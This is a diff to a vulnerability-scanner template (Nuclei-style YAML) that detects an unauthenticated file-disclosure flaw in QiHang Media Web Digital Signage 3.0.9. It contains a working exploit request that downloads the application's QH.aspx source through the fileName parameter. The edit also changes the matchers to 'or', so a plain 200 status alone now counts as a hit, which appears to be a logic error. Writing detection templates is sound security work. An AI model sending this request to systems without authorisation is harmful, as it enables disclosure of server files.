--- a/Others/qihang-media-lfi.yaml
+++ b/Others/qihang-media-lfi.yaml
@@ -1,21 +1,23 @@
 id: qihang-media-lfi
-
 info:
   name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
-  author: gy741
+  author: h0tak88r
   severity: high
-  description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
+  description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed through the filename parameter when using the download action or through the path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
   reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
-  tags: qihang,lfi,disclosure
+  tags:
+    - qihang
+    - lfi
+    - disclosure
 
 requests:
-  - raw:
-      - |
-        GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
-        Host: {{Hostname}}
-        Connection: close
-
-    matchers-condition: and
+  - method: GET
+    path:
+      - "/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx"
+    headers:
+      Host: "{{Hostname}}"
+      Connection: close
+    matchers-condition: or
     matchers:
       - type: word
         words:
@@ -23,13 +25,12 @@ requests:
           - "application/zip"
         part: header
         condition: and
-
       - type: word
-        regex:
+        words:
           - "QH.aspx.cs"
           - "QiHang.Media.Web.QH"
+        part: body
         condition: and
-
       - type: status
         status:
           - 200
